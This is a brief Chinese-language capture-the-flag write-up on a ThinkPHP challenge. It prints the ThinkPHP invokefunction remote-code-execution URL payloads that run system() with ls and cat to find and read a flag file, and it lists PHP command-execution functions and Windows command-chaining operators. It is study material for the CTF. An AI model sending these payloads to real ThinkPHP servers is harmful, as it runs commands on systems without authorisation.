打开可以看到一个比较真实的网站,也有超链接可以连接到其他的网站
看到ThinkPHP就可以想到远程执行漏洞(看wp)
语句:
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
依次往上一层文件夹查看
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../../../
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat ../../../flag
这道题是真实场景的复现,本身的语句应该不适用于所有情况,但是远程执行漏洞要了解,常用的命令也要知道
(103条消息) RCE(远程代码执行漏洞)原理及漏洞利用_Ciyaso的博客-CSDN博客_rce漏洞
系统命令执行函数
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
windows系统命令拼接方式
“|”:管道符,前面命令标准输出,后面命令的标准输入。例如:help |more
“&” commandA & commandB 先运行命令A,然后运行命令B
“||” commandA || commandB 运行命令A,如果失败则运行命令B
“&&” commandA && commandB 运行命令A,如果成功则运行命令B